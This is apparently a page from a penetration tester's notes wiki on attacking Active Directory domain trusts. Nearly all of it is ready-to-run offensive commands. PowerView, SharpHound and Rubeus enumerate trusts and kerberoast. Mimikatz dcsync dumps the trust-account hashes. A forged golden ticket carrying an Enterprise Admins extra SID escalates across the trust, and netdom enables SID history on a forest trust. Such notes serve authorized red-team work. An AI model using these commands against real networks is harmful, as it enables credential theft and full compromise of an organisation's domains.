Comment on page
Domain Trust
PowerShell Get-DomainTrust -Domain other.domain
(xct) > Assembly SharpHound3 "-c All -D other.domain"
(xct) > Rubeus kerberoast /domain:other.domain
Enumerate
([System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()).GetAllTrustRelationships()
Get-DomainTrust -API //PowerView
When Trust is enabled, computer accounts domain1$ and domain2$ is created (trust account). Shared secret of both domains is these accounts password hashes. This can be dumped as DA in one domain (and can be used for the following steps instead of krbtgt if we can not get our hands on that one):
lsadump::dcsync /domain:prod.corp1.com /user:domain1$
- 1.Gather both domains SIDs:
Get-DomainSID -Domain domain1
Get-DomainSID -Domain domain2
2. Craft golden ticket to grant Enterprise Privileges
kerberos::golden /user:<user> /domain:<domain1> /sid:<domain1-sid> /krbtgt:<krbtgt-domain1> /sids:<domain2-sid>-519 /ptt
Across Forests, extra SIDs are filtered. This can however be disabled on the dc (the intend is to disable it on corporation mergers etc.):
netdom trust <domain2> /d:corp1.com /enablesidhistory:yes
Despite enabling this, we would still get access denied because SIDs < 1000 are always filtered. In addition members of Global Security Groups will also be filtered. So we need to find a SID > 1000 with privileges that help us, (if its a group it must also not be a member of Global Security Groups).
Last modified 9mo ago